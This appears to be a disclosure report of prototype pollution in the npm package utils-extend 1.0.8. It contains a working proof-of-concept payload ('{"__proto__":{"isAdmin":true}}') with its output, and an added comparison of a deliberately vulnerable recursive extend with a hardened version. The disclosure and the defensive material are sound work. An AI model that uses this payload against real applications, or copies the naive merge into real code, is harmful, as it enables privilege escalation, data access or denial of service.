I would like to report prototype pollution in utils-extend.
It allows an attacker to modify the prototype of a base object; the severity depends on how the application uses the affected objects (DoS, access to sensitive data, RCE).
module name: utils-extend
version: 1.0.8
npm page: https://www.npmjs.com/package/utils-extend
> Extend nodejs util api, and it is light weight and simple.
[1] weekly downloads: 129,956
```js
const { extend } = require('utils-extend');

// Attacker-controlled JSON: JSON.parse creates an own "__proto__" key,
// which a recursive extend then walks into Object.prototype.
const payload = '{"__proto__":{"isAdmin":true}}';
const emptyObject = {};
const pollutionObject = JSON.parse(payload);

// Merge into a throwaway object; emptyObject is never passed to extend.
extend({}, pollutionObject);

// The unrelated object now inherits the injected property.
console.log(emptyObject.isAdmin); // true
```
```
node index.js
=> true
```
Can result in: DoS, access to restricted data, RCE (depends on implementation)
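As an added illustration (not utils-extend's own code), the recursive-extend pattern behind this class of bug next to a hardened variant; `naiveExtend`, `safeExtend` and `pollutes` are hypothetical names, and the only input is the payload from the report above.

```javascript
// Added illustration (not utils-extend's own code): a naive recursive extend
// with the pollution pattern from the report, beside a hardened variant.
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
const hasOwn = (o, k) => Object.prototype.hasOwnProperty.call(o, k);
const isPlainObject = (v) =>
  v !== null && typeof v === 'object' && Object.getPrototypeOf(v) === Object.prototype;

// Vulnerable pattern: every key of source is walked, so the own "__proto__" key
// that JSON.parse creates resolves target["__proto__"] to Object.prototype and
// the recursion writes the nested keys onto the shared prototype.
function naiveExtend(target, source) {
  for (const key in source) {
    const val = source[key];
    if (val && typeof val === 'object') {
      if (!target[key] || typeof target[key] !== 'object') target[key] = {};
      naiveExtend(target[key], val);
    } else {
      target[key] = val;
    }
  }
  return target;
}

// Hardened variant: skip keys that reach the prototype chain, iterate only own
// keys of source, and recurse only into own plain-object keys of target.
function safeExtend(target, source) {
  for (const key of Object.keys(source)) {
    if (BLOCKED_KEYS.has(key)) continue;
    const val = source[key];
    if (isPlainObject(val)) {
      if (!hasOwn(target, key) || !isPlainObject(target[key])) target[key] = {};
      safeExtend(target[key], val);
    } else {
      target[key] = val;
    }
  }
  return target;
}

// Merge a parsed payload into a fresh object and report whether `prop` became
// an own property of Object.prototype; any pollution is deleted again.
function pollutes(extendFn, json, prop) {
  extendFn({}, JSON.parse(json));
  const leaked = hasOwn(Object.prototype, prop);
  delete Object.prototype[prop];
  return leaked;
}
const PAYLOAD = '{"__proto__":{"isAdmin":true}}'; // payload from the report
console.log(pollutes(naiveExtend, PAYLOAD, 'isAdmin')); // true
console.log(pollutes(safeExtend, PAYLOAD, 'isAdmin'));  // false
```

The same key filter also blocks the `constructor.prototype` route, and the `hasOwn` check on `target` stops the merge from descending into inherited properties even when a key is not on the block list.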